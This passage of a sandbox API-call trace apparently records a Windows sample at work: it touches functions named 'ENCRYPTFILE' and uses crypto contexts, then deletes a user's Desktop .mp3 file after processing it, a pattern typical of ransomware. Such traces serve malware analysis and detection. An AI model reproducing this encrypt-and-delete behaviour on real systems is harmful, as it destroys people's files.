| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.551] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.551] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.551] CloseHandle (hObject=0x2a0) returned 1 [0122.551] CloseHandle (hObject=0x258) returned 1 [0122.555] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3", lpFilePart=0x0) returned 0x30 [0122.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d9b0 [0122.555] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\cgh9zawvty35raopeyzt.mp3")) returned 0x20 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0122.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0122.556] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0537ea0, ftCreationTime.dwHighDateTime=0x1d5ea99, ftLastAccessTime.dwLowDateTime=0x2b4da1f0, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0x2b4da1f0, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0x18e62, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="CgH9zawVTY35raopEyZt.mp3", cAlternateFileName="CGH9ZA~1.MP3")) returned 0x41ac040 [0122.556] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\cgh9zawvty35raopeyzt.mp3")) returned 1 [0122.571] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0537ea0, ftCreationTime.dwHighDateTime=0x1d5ea99, ftLastAccessTime.dwLowDateTime=0x2b4da1f0, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0x2b4da1f0, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0x18e62, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="CgH9zawVTY35raopEyZt.mp3", cAlternateFileName="CGH9ZA~1.MP3")) returned 0 [0122.571] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d9b0 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.571] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0122.571] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0122.572] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.572] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.572] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0122.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.574] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.574] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.574] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e657550, ftCreationTime.dwHighDateTime=0x1d5e6c4, ftLastAccessTime.dwLowDateTime=0x4dbb1970, ftLastAccessTime.dwHighDateTime=0x1d5e605, ftLastWriteTime.dwLowDateTime=0x4dbb1970, ftLastWriteTime.dwHighDateTime=0x1d5e605, nFileSizeHigh=0x0, nFileSizeLow=0x8f2b, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="cSg8 emhaX_r.ots", cAlternateFileName="CSG8EM~1.OTS")) returned 0x41ac600 [0122.574] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0122.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0122.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0122.575] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0122.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0122.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0122.575] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0122.576] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0122.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0122.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0122.579] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.580] 